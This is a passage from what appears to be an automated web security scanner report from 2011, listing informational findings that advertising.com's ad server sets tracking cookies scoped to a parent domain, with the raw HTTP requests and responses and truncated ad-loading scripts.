ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:19:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXIbtiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvGAHt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD7oROzNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7Nea54Ml6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 45425146=_4dfa5736,5745513245,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248841013&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=Vnk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwTqHIUbNGAH; F1=BUdS63EBAAAABAAAA8AAICA; BASE=x7Q9Yi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3H!; ROLL=U6APIjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9K!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1024394.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 783
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
F1=B8iR63EBAAAABAAAAoAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
58502192=_4dfa462f,7842678840,768034^981604^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308247597444&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; F1=BgPR63EBAAAABAAAAkAAQCA; BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:06:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:06:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: F1=B8iR63EBAAAABAAAAoAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: 58502192=_4dfa462f,7842678840,768034^981604^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
F1=BQdS63EBAAAABAAAA4AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
63972603=_4dfa49d4,3485571020,768034^960484^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248528777&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; F1=B0JS63EBAAAABAAAA0AAKCA; BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrE!; ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6DkcN!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:22:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 550
Date: Thu, 16 Jun 2011 18:22:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: F1=BQdS63EBAAAABAAAA4AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: 63972603=_4dfa49d4,3485571020,768034^960484^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cst
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P5PEEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpKPi7sVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251333485&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
